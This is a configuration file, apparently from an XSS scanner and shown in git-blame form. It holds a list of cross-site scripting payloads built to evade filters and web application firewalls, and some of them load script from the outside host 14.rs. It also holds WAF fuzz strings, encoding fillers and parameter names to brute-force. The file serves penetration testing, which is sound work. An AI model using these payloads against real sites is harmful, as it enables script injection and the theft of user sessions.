2018-11-17 23:47:33 +05:30
|
|
|
changes = '''ability to load seeds from file;show parameter name while bruteforcing;fixed payload display while using POST method'''
|
2018-11-11 15:16:27 +05:30
|
|
|
|
2018-11-12 14:05:49 +05:30
|
|
|
defaultEditor = 'nano'
|
2018-11-16 21:13:45 +05:30
|
|
|
blindPayload = '' # your blind XSS payload
|
|
|
|
|
xsschecker = 'v3dm0s' # A non malicious string to check for reflections and stuff
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-15 15:41:01 +05:30
|
|
|
# More information on adding proxies: http://docs.python-requests.org/en/master/user/advanced/#proxies
|
2018-11-16 21:13:45 +05:30
|
|
|
proxies = {'http': 'http://0.0.0.0:8080', 'https': 'http://0.0.0.0:8080'}
|
2018-11-14 10:50:22 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
minEfficiency = 90 # payloads below this efficiency will not be displayed
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
delay = 0 # default delay between http requests
|
|
|
|
|
threadCount = 10 # default number of threads
|
|
|
|
|
timeout = 10 # default number of http request timeout
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
# attributes that have special properties
|
2018-11-03 22:49:40 +05:30
|
|
|
specialAttributes = ['srcdoc', 'src']
|
|
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
badTags = ('iframe', 'title', 'textarea', 'noembed',
|
|
|
|
|
'style', 'template', 'noscript')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
tags = ('html', 'd3v', 'a', 'details') # HTML Tags
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
# "Things" that can be used between js functions and breakers e.g. '};alert()//
|
2018-10-27 18:58:52 +05:30
|
|
|
jFillings = ('-', '*', ';', '/')
|
2018-11-16 21:13:45 +05:30
|
|
|
# "Things" that can be used before > e.g. <tag attr=value%0dx>
|
|
|
|
|
lFillings = ('', '%0dx')
|
|
|
|
|
# "Things" to use between event handler and = or between function and =
|
|
|
|
|
eFillings = ('%09', '%0a', '%0d', '+')
|
|
|
|
|
fillings = ('%09', '%0a', '%0d', '/+/') # "Things" to use instead of space
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
eventHandlers = { # Event handlers and the tags compatible with them
|
|
|
|
|
'ontoggle': ['details'],
|
|
|
|
|
'onpointerenter': ['d3v', 'details', 'html', 'a'],
|
|
|
|
|
'onmouseover': ['a', 'html', 'd3v']
|
2018-10-27 18:58:52 +05:30
|
|
|
}
|
|
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
functions = ( # JavaScript functions to get a popup
|
|
|
|
|
'[8].find(confirm)', 'confirm()',
|
|
|
|
|
'(confirm)()', 'co\u006efir\u006d()',
|
|
|
|
|
'(prompt)``', 'a=prompt,a()')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
payloads = ( # Payloads for filter & WAF evasion
|
|
|
|
|
'\'"</Script><Html Onmouseover=(confirm)()//'
|
|
|
|
|
'<imG/sRc=l oNerrOr=(prompt)() x>',
|
|
|
|
|
'<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
|
|
|
|
|
'<deTails open oNToggle=confi\u0072m()>',
|
|
|
|
|
'<img sRc=l oNerrOr=(confirm)() x>',
|
|
|
|
|
'<svg/x=">"/onload=confirm()//',
|
|
|
|
|
'<svg%0Aonload=%09((pro\u006dpt))()//',
|
|
|
|
|
'<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
|
|
|
|
|
'<sCript x>confirm``</scRipt x>',
|
|
|
|
|
'<Script x>prompt()</scRiPt x>',
|
|
|
|
|
'<sCriPt sRc=//14.rs>',
|
|
|
|
|
'<embed//sRc=//14.rs>',
|
|
|
|
|
'<base href=//14.rs/><script src=/>',
|
|
|
|
|
'<object//data=//14.rs>',
|
|
|
|
|
'<s=" onclick=confirm``>clickme',
|
|
|
|
|
'<svG oNLoad=co\u006efirm(1)>',
|
|
|
|
|
'\'"><y///oNMousEDown=((confirm))()>Click',
|
|
|
|
|
'<a/href=javascript:co\u006efirm("1")>clickme</a>',
|
|
|
|
|
'<img src=x onerror=confir\u006d`1`>',
|
|
|
|
|
'<svg/onload=co\u006efir\u006d`1`>')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
fuzzes = ( # Fuzz strings to test WAFs
|
|
|
|
|
'<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
|
|
|
|
|
'<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
|
|
|
|
|
'<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
|
|
|
|
|
'<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
|
|
|
|
|
'<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
|
|
|
|
|
'"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>')
|
2018-10-27 18:58:52 +05:30
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
headers = { # default headers
|
|
|
|
|
'User-Agent': '$',
|
|
|
|
|
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
|
|
|
'Accept-Language': 'en-US,en;q=0.5',
|
|
|
|
|
'Accept-Encoding': 'gzip,deflate',
|
|
|
|
|
'Connection': 'close',
|
|
|
|
|
'DNT': '1',
|
|
|
|
|
'Upgrade-Insecure-Requests': '1',
|
2018-10-27 18:58:52 +05:30
|
|
|
}
|
|
|
|
|
|
2018-11-16 21:13:45 +05:30
|
|
|
blindParams = ( # common paramtere names to be bruteforced for parameter discovery
|
|
|
|
|
'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
|
|
|
|
|
'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
|
|
|
|
|
'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
|
|
|
|
|
'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
|
|
|
|
|
'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
|
|
|
|
|
'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
|
|
|
|
|
'height', 'add', 'result', 'log', 'demo', 'example', 'message')
|
